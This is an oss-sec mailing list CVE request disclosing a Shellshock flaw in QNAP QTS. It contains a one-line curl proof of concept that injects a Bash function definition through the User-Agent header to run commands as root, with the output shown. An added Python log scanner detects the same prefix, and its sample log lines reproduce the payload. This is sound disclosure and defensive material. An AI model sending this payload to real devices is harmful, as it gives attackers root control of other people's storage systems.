oss-sec mailing list archives

CVE request: QNAP QTS


From: Ken Lee <echain.tw () gmail com>
Date: Mon, 29 Sep 2014 09:49:42 +0800

Hello,

QNAP QTS [1] employs Bash as the default shell, and we discovered an arbitrary
code execution flaw with UID=0 via `Web administration'.
The PoC is shown below:

$ curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
*uid=0(admin) gid=0(administrators)*
HTTP/1.1 200 OK



{ "authPassed": 1, "Result": 0 }


This issue has been acknowledged [2] by QNAP and if not assigned yet,
please help to arrange a CVE identifier for this issue.
Thank you, and have a nice day.


Reference:
[1] http://www.qnap.com.tw/i/en/qts4
[2] http://www.qnap.com/useng/index.php?lang=en-us&sn=885&c=3036&sc=&n=22457
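
Added example (not part of the original message and not QNAP code): a log check for the request shape in the PoC above. It flags access-log entries whose Referer or User-Agent value begins with the Bash function-definition prefix `() {`. The combined log format, the sample log lines, the priority rule and all function names are assumptions made for illustration.

```python
import re

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# A CGI server copies these headers into environment variables; the PoC's value
# starts with "() {". Optional whitespace is tolerated to catch near variants.
FUNC_PREFIX_RE = re.compile(r'^\s*\(\)\s*\{')
HEADER_FIELDS = ("referer", "agent")

def scan_line(line):
    """Return a finding dict for a log line carrying the prefix, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if m is None:
        return None  # not in the assumed log format
    hits = [f for f in HEADER_FIELDS if FUNC_PREFIX_RE.match(m.group(f))]
    if not hits:
        return None
    parts = m.group("request").split()
    path = parts[1] if len(parts) >= 2 else ""
    # A 2xx answer from a CGI path means the handler was invoked: review first.
    served_cgi = "/cgi-bin/" in path and m.group("status").startswith("2")
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "path": path,
        "fields": hits,
        "priority": "high" if served_cgi else "low",
    }

def scan(lines):
    return [f for f in map(scan_line, lines) if f is not None]

# Constructed sample log; addresses are from the documentation range 192.0.2.0/24.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Sep/2014:09:40:01 +0800] "GET /cgi-bin/restore_config.cgi HTTP/1.1" 200 31 "-" "() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`"',
    '192.0.2.11 - - [29/Sep/2014:09:41:12 +0800] "GET /cgi-bin/login.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.12 - - [29/Sep/2014:09:42:30 +0800] "GET /index.html HTTP/1.1" 404 0 "() { ignored; }; /bin/true" "curl/7.38.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match shows only that the pattern was sent; whether it executed depends on the Bash version behind the CGI handler.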
